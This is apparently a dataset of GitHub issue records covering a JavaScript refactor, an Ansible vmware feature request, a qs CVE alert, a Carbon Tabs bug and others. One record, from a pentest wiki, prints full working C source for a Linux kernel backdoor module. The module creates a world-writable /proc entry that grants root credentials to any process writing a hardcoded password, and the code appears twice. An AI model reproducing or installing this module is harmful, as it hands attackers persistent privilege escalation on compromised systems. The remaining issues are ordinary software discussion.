releasetbar settbarposition triggerstudiomodetransition filters getsourcefilterlist createsourcefilter removesourcefilter getsourcefilterdefaultsettings getsourcefilter setsourcefilterindex setsourcefiltersettings setsourcefilterenabled scene items getsceneitemlist getgroupsceneitemlist createsceneitem removesceneitem duplicatesceneitem getsceneitemtransform setsceneitemtransform getsceneitemenabled setsceneitemenabled getsceneitemlocked setsceneitemlocked setsceneitemcolor getsceneitemcolor setsceneitemindex outputs getvirtualcamstatus togglevirtualcam startvirtualcam stopvirtualcam getreplaybufferstatus togglereplaybuffer startreplaybuffer stopreplaybuffer savereplaybuffer getlastreplaybufferreplay getreplaybuffertime setreplaybuffertime getoutputlist getoutputstatus toggleoutput startoutput stopoutput getoutputsettings setoutputsettings stream getstreamstatus togglestream startstream stopstream sendstreamcaption record getrecordstatus togglerecord startrecord stoprecord togglerecordpause pauserecord resumerecord getrecorddirectory setrecorddirectory getrecordfilenameformatting setrecordfilenameformatting media inputs getmediainputstatus offsetmediainputtimecode setmediainputtimecode setmediainputpausestate stopmediainput restartmediainput nextmediainputplaylistitem previousmediainputplaylistitem events general exitstarted studiomodestatechanged customevent config currentscenecollectionchanged scenecollectionlistchanged currentprofilechanged profilelistchanged scenes scenecreated sceneremoved scenenamechanged currentscenechanged currentprogramscenechanged currentpreviewscenechanged scenelistchanged inputs inputcreated inputremoved inputnamechanged inputmutestatechanged inputvolumechanged inputaudiosyncoffsetchanged inputaudiotrackschanged transitions transitioncreated transitionremoved transitionnamechanged currenttransitionchanged transitionstarted transitionended filters filtercreated filterremoved filternamechanged sourcefilteradded sourcefilterremoved sourcefilterlistreindexed outputs streamstatechanged recordstatechanged replaybufferstatechanged virtualcamstatechanged replaybuffersaved scene items sceneitemcreated sceneitemremoved sceneitemlistreindexed sceneitemenablestatechanged sceneitemlockstatechanged sceneitemtransformchanged media inputs mediainputplaybackstarted mediainputplaybackended mediainputactiontriggered high volume inputvolumemeters inputactivestatechanged inputshowstatechanged
1
3,686
15,055,160,193
IssuesEvent
2021-02-03 18:24:01
EMGroup/js-eden
https://api.github.com/repos/EMGroup/js-eden
closed
Use arrays not dicts for dependencies and subscribers
Construit maintainer
Symbol dependencies and subscribers are using dictionary objects when the primary operation on them it iteration which would be far faster with an array. So switch these to arrays, keeping in mind that duplicates must be avoided.
True
Use arrays not dicts for dependencies and subscribers - Symbol dependencies and subscribers are using dictionary objects when the primary operation on them it iteration which would be far faster with an array. So switch these to arrays, keeping in mind that duplicates must be avoided.
main
use arrays not dicts for dependencies and subscribers symbol dependencies and subscribers are using dictionary objects when the primary operation on them it iteration which would be far faster with an array so switch these to arrays keeping in mind that duplicates must be avoided
1
1,249
5,308,982,658
IssuesEvent
2017-02-12 04:07:02
ansible/ansible-modules-extras
https://api.github.com/repos/ansible/ansible-modules-extras
closed
vmware_guest.py implement datastore cluster support
affects_2.2 cloud feature_idea vmware waiting_on_maintainer
##### ISSUE TYPE - Feature Idea ##### COMPONENT NAME vmware_guest.py ##### ANSIBLE VERSION ``` ansible 2.2.0 ``` ##### CONFIGURATION Default configuration ##### OS / ENVIRONMENT N/A ##### SUMMARY This module should support datastore clusters in a vsphere environment. In order to deploy a template should be excellent not specify the datastore but specify the datastore cluster and automatically use SDRS funcionality to allocate the requiered resources. ``` def deploy_template(self, poweron=False, wait_for_ip=False): # FIXME: # - clusters # - multiple datacenters # - resource pools # - multiple templates by the same name # - use disk config from template by default # - static IPs ``` ##### STEPS TO REPRODUCE N/A ##### EXPECTED RESULTS N/A ##### ACTUAL RESULTS ``` N/A ```
True
vmware_guest.py implement datastore cluster support - ##### ISSUE TYPE - Feature Idea ##### COMPONENT NAME vmware_guest.py ##### ANSIBLE VERSION ``` ansible 2.2.0 ``` ##### CONFIGURATION Default configuration ##### OS / ENVIRONMENT N/A ##### SUMMARY This module should support datastore clusters in a vsphere environment. In order to deploy a template should be excellent not specify the datastore but specify the datastore cluster and automatically use SDRS funcionality to allocate the requiered resources. ``` def deploy_template(self, poweron=False, wait_for_ip=False): # FIXME: # - clusters # - multiple datacenters # - resource pools # - multiple templates by the same name # - use disk config from template by default # - static IPs ``` ##### STEPS TO REPRODUCE N/A ##### EXPECTED RESULTS N/A ##### ACTUAL RESULTS ``` N/A ```
main
vmware guest py implement datastore cluster support issue type feature idea component name vmware guest py ansible version ansible configuration default configuration os environment n a summary this module should support datastore clusters in a vsphere environment in order to deploy a template should be excellent not specify the datastore but specify the datastore cluster and automatically use sdrs funcionality to allocate the requiered resources def deploy template self poweron false wait for ip false fixme clusters multiple datacenters resource pools multiple templates by the same name use disk config from template by default static ips steps to reproduce n a expected results n a actual results n a
1
2,168
7,600,765,683
IssuesEvent
2018-04-28 06:12:25
nixawk/pentest-wiki
https://api.github.com/repos/nixawk/pentest-wiki
opened
[Maintaining Access] Linux Kernel Backdoor
Maintaining-Access
<img width="1228" alt="linux-kernel-backdoor" src="https://user-images.githubusercontent.com/7352479/39392752-15e92a76-4a81-11e8-975e-8b72ed3998eb.png"> ``` #include <linux/kernel.h> #include <linux/types.h> #include <linux/export.h> #include <linux/kthread.h> #include <linux/module.h> #include <linux/debugfs.h> #include <linux/proc_fs.h> #include <linux/uaccess.h> #include <linux/cred.h> #include <linux/slab.h> #define KERN_PROCROOT "mod" #define KERN_PROCFILE "bdm" // /proc/KERN_PROCROOT/KERN_PROCFILE #define KERN_PASSWORD "password" static ssize_t mymodule_write(struct file *, const char __user *, size_t, loff_t *); static ssize_t mymodule_read(struct file *, char __user *, size_t, loff_t *); static int mymodule_open(struct inode *, struct file *); static int mymodule_procfs_attach(void); static int __init mymodule_init(void); static void __exit mymodule_exit(void); static struct proc_dir_entry *proc_root; static struct proc_dir_entry *proc_file; static const struct file_operations proc_fops = { .open= mymodule_open, .read= mymodule_read, .write = mymodule_write, }; MODULE_LICENSE("GPL"); MODULE_AUTHOR("sunxi-debug"); MODULE_DESCRIPTION("Adds a backdoor to the linux kernel"); static ssize_t mymodule_write(struct file *file, const char __user *buffer, size_t count, loff_t *data) { char *kbuf; struct cred *cred; static struct task_struct *task; if (count < 1) return -EINVAL; kbuf = kmalloc(count, GFP_KERNEL); if (!kbuf) return -ENOMEM; if (copy_from_user(kbuf, buffer, count)) { kfree(kbuf); return -EFAULT; } if(!strncmp(KERN_PASSWORD,(char*)kbuf, strlen(KERN_PASSWORD))){ task = get_current(); cred = (struct cred *)__task_cred(task); cred->uid = GLOBAL_ROOT_UID; cred->gid = GLOBAL_ROOT_GID; cred->suid = GLOBAL_ROOT_UID; cred->euid = GLOBAL_ROOT_UID; cred->euid = GLOBAL_ROOT_UID; cred->egid = GLOBAL_ROOT_GID; cred->fsuid = GLOBAL_ROOT_UID; cred->fsgid = GLOBAL_ROOT_GID; printk(KERN_WARNING "Module is installed successfully\n"); } kfree(kbuf); return count; } static ssize_t mymodule_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) { return 0; } static int mymodule_open(struct inode *inode, struct file *file) { return 0; } static int mymodule_procfs_attach(void) { proc_root = proc_mkdir(KERN_PROCROOT, NULL); proc_file = proc_create(KERN_PROCFILE, 0666, proc_root, &proc_fops); printk(KERN_INFO "proc_create successfully\n"); if (IS_ERR(proc_file)){ printk(KERN_ERR "proc_create failed\n"); return -1; } return 0; } static int __init mymodule_init(void) { int ret; printk(KERN_INFO "module __init\n"); ret = mymodule_procfs_attach(); if(ret){ printk(KERN_INFO "module __init failed\n "); } return ret; } static void __exit mymodule_exit(void) { printk(KERN_INFO "module __exit\n"); remove_proc_entry(KERN_PROCFILE, proc_root); remove_proc_entry(KERN_PROCROOT, NULL); } module_init(mymodule_init); module_exit(mymodule_exit); // References // https://elixir.bootlin.com/linux/v4.0/source/fs/proc/generic.c#L523 // https://github.com/rapid7/metasploit-framework/issues/6869 // https://github.com/allwinner-zh/linux-3.4-sunxi/blob/bd5637f7297c6abf78f93b31fc1dd33f2c1a9f76/arch/arm/mach-sunxi/sunxi-debug.c#L41 // https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10225 // https://wiki.archlinux.org/index.php/Kernel_module // https://www.cyberciti.biz/faq/linux-how-to-load-a-kernel-module-automatically-at-boot-time/ ```
True
[Maintaining Access] Linux Kernel Backdoor - <img width="1228" alt="linux-kernel-backdoor" src="https://user-images.githubusercontent.com/7352479/39392752-15e92a76-4a81-11e8-975e-8b72ed3998eb.png"> ``` #include <linux/kernel.h> #include <linux/types.h> #include <linux/export.h> #include <linux/kthread.h> #include <linux/module.h> #include <linux/debugfs.h> #include <linux/proc_fs.h> #include <linux/uaccess.h> #include <linux/cred.h> #include <linux/slab.h> #define KERN_PROCROOT "mod" #define KERN_PROCFILE "bdm" // /proc/KERN_PROCROOT/KERN_PROCFILE #define KERN_PASSWORD "password" static ssize_t mymodule_write(struct file *, const char __user *, size_t, loff_t *); static ssize_t mymodule_read(struct file *, char __user *, size_t, loff_t *); static int mymodule_open(struct inode *, struct file *); static int mymodule_procfs_attach(void); static int __init mymodule_init(void); static void __exit mymodule_exit(void); static struct proc_dir_entry *proc_root; static struct proc_dir_entry *proc_file; static const struct file_operations proc_fops = { .open= mymodule_open, .read= mymodule_read, .write = mymodule_write, }; MODULE_LICENSE("GPL"); MODULE_AUTHOR("sunxi-debug"); MODULE_DESCRIPTION("Adds a backdoor to the linux kernel"); static ssize_t mymodule_write(struct file *file, const char __user *buffer, size_t count, loff_t *data) { char *kbuf; struct cred *cred; static struct task_struct *task; if (count < 1) return -EINVAL; kbuf = kmalloc(count, GFP_KERNEL); if (!kbuf) return -ENOMEM; if (copy_from_user(kbuf, buffer, count)) { kfree(kbuf); return -EFAULT; } if(!strncmp(KERN_PASSWORD,(char*)kbuf, strlen(KERN_PASSWORD))){ task = get_current(); cred = (struct cred *)__task_cred(task); cred->uid = GLOBAL_ROOT_UID; cred->gid = GLOBAL_ROOT_GID; cred->suid = GLOBAL_ROOT_UID; cred->euid = GLOBAL_ROOT_UID; cred->euid = GLOBAL_ROOT_UID; cred->egid = GLOBAL_ROOT_GID; cred->fsuid = GLOBAL_ROOT_UID; cred->fsgid = GLOBAL_ROOT_GID; printk(KERN_WARNING "Module is installed successfully\n"); } kfree(kbuf); return count; } static ssize_t mymodule_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) { return 0; } static int mymodule_open(struct inode *inode, struct file *file) { return 0; } static int mymodule_procfs_attach(void) { proc_root = proc_mkdir(KERN_PROCROOT, NULL); proc_file = proc_create(KERN_PROCFILE, 0666, proc_root, &proc_fops); printk(KERN_INFO "proc_create successfully\n"); if (IS_ERR(proc_file)){ printk(KERN_ERR "proc_create failed\n"); return -1; } return 0; } static int __init mymodule_init(void) { int ret; printk(KERN_INFO "module __init\n"); ret = mymodule_procfs_attach(); if(ret){ printk(KERN_INFO "module __init failed\n "); } return ret; } static void __exit mymodule_exit(void) { printk(KERN_INFO "module __exit\n"); remove_proc_entry(KERN_PROCFILE, proc_root); remove_proc_entry(KERN_PROCROOT, NULL); } module_init(mymodule_init); module_exit(mymodule_exit); // References // https://elixir.bootlin.com/linux/v4.0/source/fs/proc/generic.c#L523 // https://github.com/rapid7/metasploit-framework/issues/6869 // https://github.com/allwinner-zh/linux-3.4-sunxi/blob/bd5637f7297c6abf78f93b31fc1dd33f2c1a9f76/arch/arm/mach-sunxi/sunxi-debug.c#L41 // https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10225 // https://wiki.archlinux.org/index.php/Kernel_module // https://www.cyberciti.biz/faq/linux-how-to-load-a-kernel-module-automatically-at-boot-time/ ```
main
linux kernel backdoor img width alt linux kernel backdoor src include include include include include include include include include include define kern procroot mod define kern procfile bdm proc kern procroot kern procfile define kern password password static ssize t mymodule write struct file const char user size t loff t static ssize t mymodule read struct file char user size t loff t static int mymodule open struct inode struct file static int mymodule procfs attach void static int init mymodule init void static void exit mymodule exit void static struct proc dir entry proc root static struct proc dir entry proc file static const struct file operations proc fops open mymodule open read mymodule read write mymodule write module license gpl module author sunxi debug module description adds a backdoor to the linux kernel static ssize t mymodule write struct file file const char user buffer size t count loff t data char kbuf struct cred cred static struct task struct task if count return einval kbuf kmalloc count gfp kernel if kbuf return enomem if copy from user kbuf buffer count kfree kbuf return efault if strncmp kern password char kbuf strlen kern password task get current cred struct cred task cred task cred uid global root uid cred gid global root gid cred suid global root uid cred euid global root uid cred euid global root uid cred egid global root gid cred fsuid global root uid cred fsgid global root gid printk kern warning module is installed successfully n kfree kbuf return count static ssize t mymodule read struct file file char user buf size t size loff t ppos return static int mymodule open struct inode inode struct file file return static int mymodule procfs attach void proc root proc mkdir kern procroot null proc file proc create kern procfile proc root proc fops printk kern info proc create successfully n if is err proc file printk kern err proc create failed n return return static int init mymodule init void int ret printk kern info module init n ret mymodule procfs attach if ret printk kern info module init failed n return ret static void exit mymodule exit void printk kern info module exit n remove proc entry kern procfile proc root remove proc entry kern procroot null module init mymodule init module exit mymodule exit references
1
174,066
21,214,295,692
IssuesEvent
2022-04-11 05:09:50
LaudateCorpus1/HomeWorkApril
https://api.github.com/repos/LaudateCorpus1/HomeWorkApril
closed
CVE-2021-44907 (High) detected in qs-6.7.0.tgz, qs-6.5.1.tgz - autoclosed
security vulnerability
## CVE-2021-44907 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>qs-6.7.0.tgz</b>, <b>qs-6.5.1.tgz</b></p></summary> <p> <details><summary><b>qs-6.7.0.tgz</b></p></summary> <p>A querystring parser that supports nesting and arrays, with a depth limit</p> <p>Library home page: <a href="https://registry.npmjs.org/qs/-/qs-6.7.0.tgz">https://registry.npmjs.org/qs/-/qs-6.7.0.tgz</a></p> <p>Path to dependency file: /Application/package.json</p> <p>Path to vulnerable library: /Application/node_modules/body-parser/node_modules/qs/package.json,/Application/node_modules/express/node_modules/qs/package.json</p> <p> Dependency Hierarchy: - sails-1.5.2.tgz (Root Library) - express-4.17.1.tgz - :x: **qs-6.7.0.tgz** (Vulnerable Library) </details> <details><summary><b>qs-6.5.1.tgz</b></p></summary> <p>A querystring parser that supports nesting and arrays, with a depth limit</p> <p>Library home page: <a href="https://registry.npmjs.org/qs/-/qs-6.5.1.tgz">https://registry.npmjs.org/qs/-/qs-6.5.1.tgz</a></p> <p>Path to dependency file: /Application/package.json</p> <p>Path to vulnerable library: /Application/node_modules/qs/package.json</p> <p> Dependency Hierarchy: - grunt-contrib-watch-1.1.0.tgz (Root Library) - tiny-lr-1.1.1.tgz - :x: **qs-6.5.1.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/LaudateCorpus1/HomeWorkApril/commit/89c4ff51dbbd3fc1f630cdd6dfe647f6ad6ec7d3">89c4ff51dbbd3fc1f630cdd6dfe647f6ad6ec7d3</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior. <p>Publish Date: 2022-03-17 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-44907>CVE-2021-44907</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44907">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44907</a></p> <p>Release Date: 2022-03-17</p> <p>Fix Resolution: qs - 6.8.1</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2021-44907 (High) detected in qs-6.7.0.tgz, qs-6.5.1.tgz - autoclosed - ## CVE-2021-44907 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>qs-6.7.0.tgz</b>, <b>qs-6.5.1.tgz</b></p></summary> <p> <details><summary><b>qs-6.7.0.tgz</b></p></summary> <p>A querystring parser that supports nesting and arrays, with a depth limit</p> <p>Library home page: <a href="https://registry.npmjs.org/qs/-/qs-6.7.0.tgz">https://registry.npmjs.org/qs/-/qs-6.7.0.tgz</a></p> <p>Path to dependency file: /Application/package.json</p> <p>Path to vulnerable library: /Application/node_modules/body-parser/node_modules/qs/package.json,/Application/node_modules/express/node_modules/qs/package.json</p> <p> Dependency Hierarchy: - sails-1.5.2.tgz (Root Library) - express-4.17.1.tgz - :x: **qs-6.7.0.tgz** (Vulnerable Library) </details> <details><summary><b>qs-6.5.1.tgz</b></p></summary> <p>A querystring parser that supports nesting and arrays, with a depth limit</p> <p>Library home page: <a href="https://registry.npmjs.org/qs/-/qs-6.5.1.tgz">https://registry.npmjs.org/qs/-/qs-6.5.1.tgz</a></p> <p>Path to dependency file: /Application/package.json</p> <p>Path to vulnerable library: /Application/node_modules/qs/package.json</p> <p> Dependency Hierarchy: - grunt-contrib-watch-1.1.0.tgz (Root Library) - tiny-lr-1.1.1.tgz - :x: **qs-6.5.1.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/LaudateCorpus1/HomeWorkApril/commit/89c4ff51dbbd3fc1f630cdd6dfe647f6ad6ec7d3">89c4ff51dbbd3fc1f630cdd6dfe647f6ad6ec7d3</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior. <p>Publish Date: 2022-03-17 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-44907>CVE-2021-44907</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44907">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44907</a></p> <p>Release Date: 2022-03-17</p> <p>Fix Resolution: qs - 6.8.1</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_main
cve high detected in qs tgz qs tgz autoclosed cve high severity vulnerability vulnerable libraries qs tgz qs tgz qs tgz a querystring parser that supports nesting and arrays with a depth limit library home page a href path to dependency file application package json path to vulnerable library application node modules body parser node modules qs package json application node modules express node modules qs package json dependency hierarchy sails tgz root library express tgz x qs tgz vulnerable library qs tgz a querystring parser that supports nesting and arrays with a depth limit library home page a href path to dependency file application package json path to vulnerable library application node modules qs package json dependency hierarchy grunt contrib watch tgz root library tiny lr tgz x qs tgz vulnerable library found in head commit a href found in base branch master vulnerability details a denial of service vulnerability exists in qs up to due to insufficient sanitization of property in the gs parse function the merge function allows the assignment of properties on an array in the query for any property being assigned a value in the array is converted to an object containing these properties essentially this means that the property whose expected type is array always has to be checked with array isarray by the user this may not be obvious to the user and can cause unexpected behavior publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution qs step up your open source security game with whitesource
0
1,434
6,223,445,558
IssuesEvent
2017-07-10 11:57:19
chocolatey/chocolatey-package-requests
https://api.github.com/repos/chocolatey/chocolatey-package-requests
opened
RFM - rukerneltool
Status: Available For Maintainer(s)
The maintainers from the [rukerneltool](https://chocolatey.org/packages/rukerneltool) recently decided to stop maintaining this package and is requesting a new maintainer for it. The source of the package is available [here](https://github.com/chocolatey/chocolatey-coreteampackages/tree/48432b87549778f930b9f0012c61d112237525c6/automatic/rukerneltool).
True
RFM - rukerneltool - The maintainers from the [rukerneltool](https://chocolatey.org/packages/rukerneltool) recently decided to stop maintaining this package and is requesting a new maintainer for it. The source of the package is available [here](https://github.com/chocolatey/chocolatey-coreteampackages/tree/48432b87549778f930b9f0012c61d112237525c6/automatic/rukerneltool).
main
rfm rukerneltool the maintainers from the recently decided to stop maintaining this package and is requesting a new maintainer for it the source of the package is available
1
4,476
23,344,873,065
IssuesEvent
2022-08-09 16:57:51
carbon-design-system/carbon
https://api.github.com/repos/carbon-design-system/carbon
closed
[Bug]: React Tabs storybook could be improved
type: docs 📖 severity: 4 impact: low good first issue 👋 status: waiting for maintainer response 💬 package: @carbon/react
### Package @carbon/react ### Browser Chrome ### Package version https://react.carbondesignsystem.com/?path=/story/components-tabs--manual ### React version _No response_ ### Description If you go to https://react.carbondesignsystem.com/?path=/story/components-tabs--manual the Example button is _always_ showing up. However, it is supposed to appear _only_ when the second tab is selected. <img width="909" alt="Screenshot 2022-04-26 at 7 41 46 AM" src="https://user-images.githubusercontent.com/14298245/165327368-6b5dad96-398d-456b-8c59-8c2a9c263535.png"> Here's what it should look like.... The non-manual with tab 1 selected: <img width="956" alt="image" src="https://user-images.githubusercontent.com/14298245/165326933-b4c63920-232d-4a2d-8c9d-b487863d428d.png"> And then non-manual when the second tab is selected <img width="919" alt="image" src="https://user-images.githubusercontent.com/14298245/165327549-d186d658-1294-4f9a-bf0d-1311cf0436c3.png"> --- BTW, in addition to it appearing when it shouldn't on the manual example, in all examples, I'd like to suggest that this Example button should be located underneath the "Tab Panel 2" text. it's pretty awkward/non-sensical where it is. If you agree its position is odd, it needs to be repositioned across all Tabs examples. ### CodeSandbox example https://react.carbondesignsystem.com/?path=/story/components-tabs--manual ### Steps to reproduce It's probably better to list the steps for what it's supposed to be. Expected behaviour: 1. navigate to the tab example 2. confirm that Example button does not appear on tab panel 1 3. Navigate to tab 2 (and activate if necessary) 4. Confirm the Example button appears on tab panel 2 5. Navigate to tab 3, activating if necessary 6. Confirm the Example button does not appear on tab panel 3. Carry this out with https://react.carbondesignsystem.com/?path=/story/components-tabs--contained and it will pass. Carry it out with https://react.carbondesignsystem.com/?path=/story/components-tabs--manual and it will fail. ### Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md) - [X] I checked the [current issues](https://github.com/carbon-design-system/carbon/issues) for duplicate problems
True
[Bug]: React Tabs storybook could be improved - ### Package @carbon/react ### Browser Chrome ### Package version https://react.carbondesignsystem.com/?path=/story/components-tabs--manual ### React version _No response_ ### Description If you go to https://react.carbondesignsystem.com/?path=/story/components-tabs--manual the Example button is _always_ showing up. However, it is supposed to appear _only_ when the second tab is selected. <img width="909" alt="Screenshot 2022-04-26 at 7 41 46 AM" src="https://user-images.githubusercontent.com/14298245/165327368-6b5dad96-398d-456b-8c59-8c2a9c263535.png"> Here's what it should look like.... The non-manual with tab 1 selected: <img width="956" alt="image" src="https://user-images.githubusercontent.com/14298245/165326933-b4c63920-232d-4a2d-8c9d-b487863d428d.png"> And then non-manual when the second tab is selected <img width="919" alt="image" src="https://user-images.githubusercontent.com/14298245/165327549-d186d658-1294-4f9a-bf0d-1311cf0436c3.png"> --- BTW, in addition to it appearing when it shouldn't on the manual example, in all examples, I'd like to suggest that this Example button should be located underneath the "Tab Panel 2" text. it's pretty awkward/non-sensical where it is. If you agree its position is odd, it needs to be repositioned across all Tabs examples. ### CodeSandbox example https://react.carbondesignsystem.com/?path=/story/components-tabs--manual ### Steps to reproduce It's probably better to list the steps for what it's supposed to be. Expected behaviour: 1. navigate to the tab example 2. confirm that Example button does not appear on tab panel 1 3. Navigate to tab 2 (and activate if necessary) 4. Confirm the Example button appears on tab panel 2 5. Navigate to tab 3, activating if necessary 6. Confirm the Example button does not appear on tab panel 3. Carry this out with https://react.carbondesignsystem.com/?path=/story/components-tabs--contained and it will pass. Carry it out with https://react.carbondesignsystem.com/?path=/story/components-tabs--manual and it will fail. ### Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md) - [X] I checked the [current issues](https://github.com/carbon-design-system/carbon/issues) for duplicate problems
main
react tabs storybook could be improved package carbon react browser chrome package version react version no response description if you go to the example button is always showing up however it is supposed to appear only when the second tab is selected img width alt screenshot at am src here s what it should look like the non manual with tab selected img width alt image src and then non manual when the second tab is selected img width alt image src btw in addition to it appearing when it shouldn t on the manual example in all examples i d like to suggest that this example button should be located underneath the tab panel text it s pretty awkward non sensical where it is if you agree its position is odd it needs to be repositioned across all tabs examples codesandbox example steps to reproduce it s probably better to list the steps for what it s supposed to be expected behaviour navigate to the tab example confirm that example button does not appear on tab panel navigate to tab and activate if necessary confirm the example button appears on tab panel navigate to tab activating if necessary confirm the example button does not appear on tab panel carry this out with and it will pass carry it out with and it will fail code of conduct i agree to follow this project s i checked the for duplicate problems
1
94,833
11,914,464,587
IssuesEvent
2020-03-31 13:38:40
fecgov/fec-cms
https://api.github.com/repos/fecgov/fec-cms
closed
Add reaction box below Presidential candidate map
HOTFIX Work: UX/Design
**What we're after:** Now that the map is live and seems to be working just wonderfully, we should add a reaction box to track feedback from users. **Completion criteria:** - [ ] Add reaction box, centered, below the feature under a feature flag Example of how the reaction box looks. This one is below WCCF. <img width="884" alt="Screen Shot 2020-03-26 at 12 23 12 PM" src="https://user-images.githubusercontent.com/31663028/77670533-b73b1b80-6f5c-11ea-80eb-04fcb86c8e9f.png">
1.0
Add reaction box below Presidential candidate map - **What we're after:** Now that the map is live and seems to be working just wonderfully, we should add a reaction box to track feedback from users. **Completion criteria:** - [ ] Add reaction box, centered, below the feature under a feature flag Example of how the reaction box looks. This one is below WCCF. <img width="884" alt="Screen Shot 2020-03-26 at 12 23 12 PM" src="https://user-images.githubusercontent.com/31663028/77670533-b73b1b80-6f5c-11ea-80eb-04fcb86c8e9f.png">
non_main
add reaction box below presidential candidate map what we re after now that the map is live and seems to be working just wonderfully we should add a reaction box to track feedback from users completion criteria add reaction box centered below the feature under a feature flag example of how the reaction box looks this one is below wccf img width alt screen shot at pm src
0
2,977
10,720,173,118
IssuesEvent
2019-10-26 15:48:07
precice/precice
https://api.github.com/repos/precice/precice
opened
Simplify Communication Interface
maintainability
The current list of functions required to implement a communication backend is [absouletly huge](https://xgm.de/precice/docs/develop/classprecice_1_1com_1_1Communication.html). Currently this is the following cross product **for each POD** (char, int, double): ` {send, reveive} x (synchronous, asynchronous, broadcast} x {POD, vector<POD>, pointer to POD & size}` Instead, we could do as `boost.asio` does and implement a `const_buffer` for sending and a `mutable_buffer` for receiving data. Those buffers are essentially just a pointer and a size. The three versions for `POD, vector<POD>, pointer to POD & size` can the be implemented in terms of sending or receiving a `_buffer<POD>` as non-virtual functions in `com::Communication`. Thus, we would reduce the cross product for each POD (char, int, double) to ` {send, reveive} x (synchronous, asynchronous, broadcast}`. We could also remove all functions except `_buffer`-calls from the communication module and require some sort of `com::buffer()` to be called at the call-side. Similar to [`boost::asio::buffer()`](https://www.boost.org/doc/libs/1_71_0/doc/html/boost_asio/reference/buffer.html). This would make debugging and adding new back-ends easier. It also reduces possible traps as there is only one function to implement per type and purpose.
True
Simplify Communication Interface - The current list of functions required to implement a communication backend is [absouletly huge](https://xgm.de/precice/docs/develop/classprecice_1_1com_1_1Communication.html). Currently this is the following cross product **for each POD** (char, int, double): ` {send, reveive} x (synchronous, asynchronous, broadcast} x {POD, vector<POD>, pointer to POD & size}` Instead, we could do as `boost.asio` does and implement a `const_buffer` for sending and a `mutable_buffer` for receiving data. Those buffers are essentially just a pointer and a size. The three versions for `POD, vector<POD>, pointer to POD & size` can the be implemented in terms of sending or receiving a `_buffer<POD>` as non-virtual functions in `com::Communication`. Thus, we would reduce the cross product for each POD (char, int, double) to ` {send, reveive} x (synchronous, asynchronous, broadcast}`. We could also remove all functions except `_buffer`-calls from the communication module and require some sort of `com::buffer()` to be called at the call-side. Similar to [`boost::asio::buffer()`](https://www.boost.org/doc/libs/1_71_0/doc/html/boost_asio/reference/buffer.html). This would make debugging and adding new back-ends easier. It also reduces possible traps as there is only one function to implement per type and purpose.
main
